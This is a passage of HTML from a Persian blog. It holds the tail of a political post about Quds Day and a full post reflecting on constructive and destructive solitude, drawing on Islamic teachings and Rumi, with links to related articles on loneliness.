گرفته شد! یعنی بجای رژیم اشغال گر به دولت مخالف با آن رژیم شعار داده شد! </span></font><br><font color="#009900"><span style="background-color: rgb(255, 255, 204);">حالا خدا وکیلی بگویید چه کسی با دیدن و شنیدن این صحنه ها قند تو دلش آب شد؟ اصولا پیدا کنید پرتقال فروش را ... <br></span></font></font></span></font></p> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <b><a href="/post/tag/روز قدس">روز قدس</a>، <a href="/post/tag/آب به آسیاب دشمن ریختن">آب به آسیاب دشمن ریختن</a>، <a href="/post/tag/نفاق">نفاق</a>، <a href="/post/tag/منافق">منافق</a>، <a href="/post/tag/حسن روحانی">حسن روحانی</a>،</b></font><br><br><br></font> </div></div> text/html 2017-06-22T11:53:01+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی تنهایی خــوش وَ تنهایی نـــاخــوش ؟! http://1001SHAYADOBAYAD.mihanblog.com/post/3524 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: 45pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 95px; margin-top: 0; margin-bottom: 0"> <span style="letter-spacing: 1pt; vertical-align: bottom"> <span style="text-decoration: overline; background-color: #F2F2F2"> <font size="6" face="Arial"><font color="#0000FF"><u>&nbsp;</u></font><a href="http://www.migna.ir/vdcewe8e.jh87ni9bbj.html" target="_blank"> تنهایی خــوش وَ تنهایی نـــاخــوش ؟!</a><font color="#0000FF"><u>&nbsp;&nbsp;&nbsp; </u></font></font></span></span></p> <p style="line-height: 95px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8298523976/TANH8EEYE_XOSH_1.jpg" alt="http://s8.picofile.com/file/8298523976/TANH8EEYE_XOSH_1.jpg" class="shrinkToFit" height="491" border="0" width="650"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8298524468/TANH8EEYE_XOSH_2.jpg" alt="http://s8.picofile.com/file/8298524468/TANH8EEYE_XOSH_2.jpg" class="shrinkToFit" height="877" width="651"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8298524750/ESHQ_VA_DUST_D8SHTAN_1.jpg" alt="http://s9.picofile.com/file/8298524750/ESHQ_VA_DUST_D8SHTAN_1.jpg" class="shrinkToFit" height="802" width="649"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s9.picofile.com/file/8298525418/TANH8EEYE_N8XOSH_1.jpg" alt="http://s9.picofile.com/file/8298525418/TANH8EEYE_N8XOSH_1.jpg" class="shrinkToFit" height="654" width="648"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8298525692/TANH8EEYE_N8XOSH_2.jpg" alt="http://s8.picofile.com/file/8298525692/TANH8EEYE_N8XOSH_2.jpg" class="shrinkToFit" height="716" border="0" width="647"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <img src="http://s8.picofile.com/file/8298526384/TANH8EEYE_N8XOSH_3.jpg" alt="http://s8.picofile.com/file/8298526384/TANH8EEYE_N8XOSH_3.jpg" class="shrinkToFit" height="646" width="646"></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <span style="vertical-align: text-bottom"> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: 45pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> </b><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><b style="font-style: normal; font-variant: 56px; line-height: 45pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> &nbsp;تاریخ بشر را آدمیان متوسطی پر کرده‌اند که زندگی در جمع را بر انزوای فردی ترجیح داده و می‌دهند. عزلت و انزوا و قطع ارتباط با دیگران برای بیشتر مردم امری است نامطلوب و نوعی شکنجه. اما در میان خیل عظیم انسان‌ها، افرادی جمع‌گریز هم بوده‌اند که یا فاقد توانایی‌ها و مهارت‌های لازم برای زندگی با دیگران بوده‌اند و یا بنا بر دلایلی خاص، گوشه‌نشینی و عزلت را بر اختلاط با مردم ترجیح داده‌اند.</b></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> دسته اول شامل افرادی می‌شود که از سر ناچاری و انفعال تن به تنهایی می‌دهند و غالباً نیز از این وضعیت رنج می‌برند، مثل برخی از بیماران روانی دچار افسردگی. تنهایی این گروه را می‌توان «تنهایی منفی یا مخرب» نامید.</b></p></font><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">اما</b></font><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> دسته دوم کسانی هستند که آگاهانه و هدفدار سراغ تنهایی می‌روند، چون از تنها بودن لذت می‌برند، مثل بیشتر عارفان و صوفیان. تنهایی این گروه را می‌توان «تنهایی مثبت یا سازنده» تلقی کرد.</b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> هدف این نوشتار بررسی آثار مثبت یا منفی تنهایی در زندگی افراد معمولی و متعارفی است که در جوامع بشری زندگی می‌کنند.<br> </b></font> <font size="4" face="Microsoft Sans Serif" color="#0000FF"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> &nbsp;هراس از تنهایی <br> </b></font> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> چرا بیشتر ما از تنهایی گریزانیم؟‌ چرا به محض اینکه تنها می‌شویم فوراً سعی می‌کنیم به هر وسیله‌ای که شده (سراغ دیگران رفتن، به آنها تلفن زدن، گوش دادن به رادیو یا تماشای تلویزیون، مطالعه کتاب یا ورود به اینترنت خود را سرگرم کنیم تا از تنهایی درآییم؟ چرا وقتی هیچ یک از این وسایل و شیوه‌ها را در اختیار نداریم، کلافه و بی‌حوصله می‌شویم؟</b></font><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"><font size="4" face="Microsoft Sans Serif" color="#0000FF"> پاسخ همه این سؤال‌ها یک چیز است: هراس از خود. وقتی تنها می‌شویم، در واقع نزد خویشتن خویش حضور پیدا می‌کنیم و چون تصویری مثبت از خود نداریم و اساساً با خود بیگانه‌ایم، قادر به تحمل خویش نیستیم و راهی برای فرار از این وضعیت می‌جوییم.</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"><br> &nbsp;توجه انسان به ماهیت یگانه خود و تنهایی وجودی خویشتن و پرداختن به نهانی‌های درون خویش رفته رفته موجب آشتی او با خود می‌شود و همین امر همنشینی او با خویش را دلنشین می‌کند.</font></b><font size="4" face="Microsoft Sans Serif" color="#00B700"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #F2F2F2"> استمرار در این امر به تدریج باعث انس آدمی به خلوت و تنهایی می‌شود از همین نکته روشن می‌شود که چرا روح‌های بزرگ نه تنها هراسی از تنهایی ندارند، بلکه مشتاق آن هستند. تاریخ نیز گواهی می‌دهد که همه انسان‌های بزرگ، از انبیا گرفته تا عرفا و حکما، با تنهایی انس داشته و از بودن در حضور خویش لذت می‌برده‌اند.</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> نکته این است که این روح‌های بزرگ، آن‌قدر خویشتن خویش را آشنا و دوست‌داشتنی می‌یافتند که نه تنها از حضور در محضر خویش ملول نمی‌شدند، بلکه</b></font><font size="4" face="Microsoft Sans Serif" color="#00B700"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #F2F2F2"> چنین فرصت‌هایی را مغتنم می‌شمردند،‌ از آن استقبال می‌کردند و آن را به مجالی برای خلوت با معبود و راز و نیاز با محبوب تبدیل می‌کردند.</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> در عوض، بیشتر ما به علت آنکه کمال و فضیلتی در خود سراغ نداریم از خود گریزانیم و تاب نشستن در محضر خویش را نداریم.</b></font><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> اتفاقاً ترس از مرگ نیز ریشه در همین واقعیت دارد، چون مرگ وضعیتی است که با آن پیوندهای بیرونی (اجتماعی) انسان قطع می‌شود و او با خویشتن خویش تنها می‌ماند.</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br> </b></font> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> <font size="4" face="Microsoft Sans Serif" color="#0000FF">&nbsp;بازیافت خویش <br> </font> </b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="4" face="Microsoft Sans Serif" color="#0033CC">&nbsp;حال اگر هراس از تنهایی نشانه ترس ما از خویشتن خود باشد، چگونه می‌توان بر این هراس غلبه کرد؟ راه‌حل فقط در یک چیز است: بازیافتن خود.</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"><font size="4" face="Microsoft Sans Serif" color="#0000FF"> ولی این تلاش می‌باید در بستر همین زندگی اجتماعی صورت پذیرد،‌ نه در انزوای مطلق و گریز کامل از آدمیان،‌ چون این شیوه نه با فطرت بشر سازگار است، نه با ضرورت‌های زندگی این جهانی همخوانی دارد.</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"> دشواری‌ کار نیز از همین جا ناشی می‌شود که هر انسانی از روی طبع یا ضرورت، در جامعه زندگی می‌کند، ‌ولی با اندک تأملی درمی‌یابد که موجودی است یگانه و تنها که با وجود همه ارتباطات بیرونی و اجتماعی، ‌هویتی فردی و مختص خویش دارد. نه این امکان برایش فراهم است که از جامعه و ارتباطات اجتماعی خویش به صورتی کلی رهایی یابد و به خود بپردازد،‌ نه اینکه پیوندهای اجتماعی او می‌تواند جایگزین هویت فردی و شخصی او شود. او خودش است و خویشتن خود، تا با خود چه سودا کند.<br> </font> </b> <font size="4" face="Microsoft Sans Serif" color="#0000FF"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> &nbsp;روح‌های بزرگ ، آن‌قدر خویشتن خویش را آشنا و دوست‌داشتنی می‌یافتند که نه تنها از حضور در محضر خویش ملول نمی‌شدند، بلکه چنین فرصت‌هایی را مغتنم می‌شمردند،</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">‌ گویی پاره‌ای از آموزه‌های اسلامی هم در مقام یادآوری همین نکته اساسی به انسان است. برای نمونه، علی‌رغم همه توصیه‌های دینی در مورد اهمیت پیوندهای خانوادگی و مسئولیت‌های اجتماعی، قرآن تصریح می‌کند که انسان به صورت فردی خلق شده و به همین صورت فردی نیز وارد عرصه آخرت می‌شود. (سوره انعام، آیه94) به تعبیری دیگر، هر انسانی همواره موجودیتی فردی و یگانه دارد. ولی در زندگی دنیوی، به اقتضای شرایط، ناگزیر از زیستن جمعی با دیگران است که این امر می‌تواند موجب غفلت او از ماهیت فردی خویش شود.</b></font><font size="4" face="Microsoft Sans Serif" color="#00B700"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> از این رو است که اهل معرفت توصیه می‌کنند که «در میان مردم باشید، ولی با آنها مباشید»</b></font><font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> (کن فی‌الناس و لاتکن معهم)</b></font><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"><font size="4" face="Microsoft Sans Serif" color="#00B700"> یعنی مباد آنکه اقتضائات زندگی اجتماعی در دنیا موجب غفلت شما از ماهیت فردی و یگانه‌تان شود، چون سرمایه‌ اصلی‌تان چیزی غیر از خودتان نیست.</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"><br> </font> </b> <font size="4" face="Microsoft Sans Serif" color="#0000FF"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFF00"> &nbsp;تنها میان تن‌ها <br> </b></font> <font size="4" face="Microsoft Sans Serif" color="#00B700"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #F2F2F2"> &nbsp;چه گوهرها که بر اثر کاویدن در خویش و تأمل در هستی و نجوا با معبود به دست نمی‌آید. اما این امر مستلزم گریز از جامعه، ترک مسئولیت‌های اجتماعی و در پیش گرفتن زندگی راهبانه نیست </b></font> <font size="4" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> (لا رهبانیه ‌فی ‌الاسلام)، بلکه نیازمند فراهم کردن فرصت‌هایی معین در بستر زندگی اجتماعی است، برای حضور در محضر خویش، همچنان که شیوه همه پیامبران و جانشینان آنها نیز همین بوده است.<br> &nbsp;روشن است که توفیق بهره‌جویی از خلوت با خویش نیازمند کسب حداقلی از پاکیزگی درونی است، چرا که خلوت ناپارسایان جز افزودن بر بدی‌ها نتواند بود. از این جنبه حداقلی که بگذریم، بهره‌مندی از فواید تنهایی و خلوت با خویش نیازمند تأمل و ممارست مداوم در احوال درون است و این راهی است که هر که باید به پای خویش در آن گام نهد.</b></font><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"><font size="4" face="Microsoft Sans Serif" color="#00B700"> بندگی جدید مجال کمی برای خلوت انسان‌ها با خویش باقی نهاده و از سوی دیگر، دانش جدید نیز بیشتر به ابعاد منفی تنهایی (تنهایی مخرب) پرداخته است، ولی این همه نباید موجب غفلت از آثار مثبت و سازنده انس با تنهایی شود.</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #F2F2F2"><font size="4" face="Microsoft Sans Serif" color="#00B700"> کافی است در گیر وُ دار اشتغالات زندگی، فرصت‌هایی بیابیم، چشم از جهان پر آب و رنگ بیرون بدوزیم و لختی به تماشای جهان پر رمز و راز درون بنشینیم تا به توصیه مولوی عمل کرده باشیم که چنین بانگ رسا در عالم سر داده است:</font></b><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="4" face="Microsoft Sans Serif" color="#0033CC"><br> </font> </b> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC"> <font size="4" face="Microsoft Sans Serif" color="#00B700">&nbsp;ای بستگان تن، به تماشای جان روید آخر رسول گفت تماشا مبارک است.</font></b></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <span style="background-color: #FFFF00"><font size="4" color="#0000FF"> مقالات مرتبط : </font></span></p> <div class="docDiv2VBody mainDiv4VBodyOn"> <p class="mainDiv3Title"><font face="Arial"> <span style="text-decoration: overline"> <span style="vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.migna.ir/vdcba8ba.rhbgfpiuur.html" title="[1395-12-03 23:29] «تنهایی» مفهوم آشنایی برای تمام انسان‌ها است. همهٔ ما آن را تجربه کرده‌ایم و درک مشخصی از آن داریم؛ ..."> <font size="4">انواعِ مختلفِ احساسِ تنهایی و راه‌های مواجهه با آنها</font></a><u><font size="4" color="#0000FF"> </font></u></span></span></font> </p></div> <div class="docDiv2VBody mainDiv4VBodyOn"> <p class="mainDiv3Title"><font face="Arial"> <span style="text-decoration: overline"> <span style="vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.migna.ir/vdcdk90s.yt0nf6a22y.html" title="[1395-10-14 00:00] محققان دانشگاه هاروارد پس از کشف ارتباط بین تنهایی و سطح پروتئین لخته کننده خون دریافتند که تنهایی و ..."> <font size="4">تنهایی به اندازه سیگار کشنده است</font></a><u><font size="4" color="#0000FF"> </font></u></span></span></font> </p></div> <div class="docDiv2VBody mainDiv4VBodyOn"> <p class="mainDiv3Title"><font face="Arial"> <span style="text-decoration: overline"> <span style="vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.migna.ir/vdcjovet.uqeoyzsffu.html" title="[1395-06-03 19:17] محققان دانشگاه هاروارد پس از کشف ارتباط بین تنهایی و سطح پروتئین لخته کننده خون دریافتند که تنهایی و ..."> <font size="4">تنهایی به اندازه سیگار کشنده است</font></a><u><font size="4" color="#0000FF"> </font></u></span></span></font> </p></div> <div class="docDiv2VBody mainDiv4VBodyOn"> <p class="mainDiv3Title"><font face="Arial"> <span style="text-decoration: overline"> <span style="vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.migna.ir/vdcftvdm.w6dvvagiiw.html" title="[1395-02-02 11:54] محققان دریافتند افراد تنها و منزوی بیش از دیگران در معرض خطر ابتلا به سكته قلبی و مغزی هستند."> <font size="4">ارتباط تنـــهایی و انزوا با بیماری قلبی و مغزی</font></a><u><font size="4" color="#0000FF"> </font></u></span></span></font> </p></div> <div class="docDiv2VBody mainDiv4VBodyOn"> <p class="mainDiv3Title"><font face="Arial"> <span style="text-decoration: overline"> <span style="vertical-align: bottom; background-color: #F2F2F2"> <a href="http://www.migna.ir/vdcj8xet.uqemizsffu.html" title="[1395-01-16 23:58] سر شلوغی خودتان و آدم های دیگر را بهانه نکنید؛ حتی در روزهای شلوغ هم آدم ها به اندازه کافی برای وقت ..."> <font size="4">چرا هیچ کس دلش نمی خواهد با شما وقت بگذراند؟</font></a><u><font size="4" color="#0000FF"> </font></u></span></span></font> </p></div> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> &nbsp;</p> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: 